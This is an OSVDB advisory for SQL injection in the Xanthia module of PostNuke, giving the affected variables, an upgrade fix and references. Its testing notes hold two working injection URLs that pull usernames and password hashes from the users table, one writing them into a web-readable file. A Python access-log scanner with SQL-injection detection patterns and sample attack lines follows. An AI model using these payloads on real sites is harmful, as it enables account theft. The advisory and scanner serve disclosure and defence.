PostNuke Xanthia Module Multiple Variable SQL Injection

2005-05-21T11:01:41
ID OSVDB:16786
Type osvdb
Reporter Maksymilian Arciemowicz (max@jestsuper.pl)
Modified 2005-05-21T11:01:41

Description

Vulnerability Description

The Xanthia module for PostNuke contains a flaw that may allow a remote attacker to inject or manipulate SQL queries. The issue is due to the 'riga' and 'module' variables in the Xanthia module not being properly sanitized before they are used in SQL queries.

Solution Description

Upgrade to version 0.750b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[victim]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/

http://[victim]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/ Xanthia_cache/cXIb8O3'/&type=admin&func=view
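Sites that ran an affected version can search their web server access logs for requests of the shape shown above. The following Python script is an added example, not part of the original advisory; the log format, the sample lines and the rule that a legitimate 'module' value is a plain identifier are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: legitimate PostNuke module names are plain identifiers.
MODULE_OK = re.compile(r"[A-Za-z0-9_]+\Z")
# SQL syntax of the kind the advisory reports in the 'riga' variable.
SQL_MARKERS = re.compile(r"'|\bunion\b.+\bselect\b|\binto\s+outfile\b", re.I | re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines in Apache common log format
    '192.0.2.10 - - [21/May/2005:11:00:00 +0000] "GET /index.php?module=Xanthia&type=admin&func=view HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/May/2005:11:00:05 +0000] "GET /index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga%5B0%5D=%27%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 812',
    '198.51.100.7 - - [21/May/2005:11:00:09 +0000] "GET /index.php?module=Xanthia%27%20UNION%20SELECT%201,2&type=admin&func=view HTTP/1.1" 200 640',
]

def suspicious_params(url):
    """Return the sorted names of query parameters that carry SQL syntax."""
    hits = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name == "module" and not MODULE_OK.match(value):
            hits.add(name)          # module value is not a bare identifier
        elif name.startswith("riga") and SQL_MARKERS.search(value):
            hits.add(name)          # riga, riga[0], riga[1], ...
    return sorted(hits)

def scan(log_lines):
    """Return (client_ip, [parameter names]) for each suspicious request."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue                # not a parseable request line
        params = suspicious_params(m.group(1))
        if params:
            findings.append((line.split(" ", 1)[0], params))
    return findings

if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(f"{ip}: suspicious value in {', '.join(params)}")
```

Access logs record only the query string, so values sent in a POST body are not covered by this check.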

References:

Vendor URL: http://www.postnuke.com/
Secunia Advisory ID: 15450
Other Advisory URL: http://news.postnuke.com/Article2691.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0258.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0256.html
ISS X-Force ID: 20688
CVE-2005-1694
CVE-2005-1700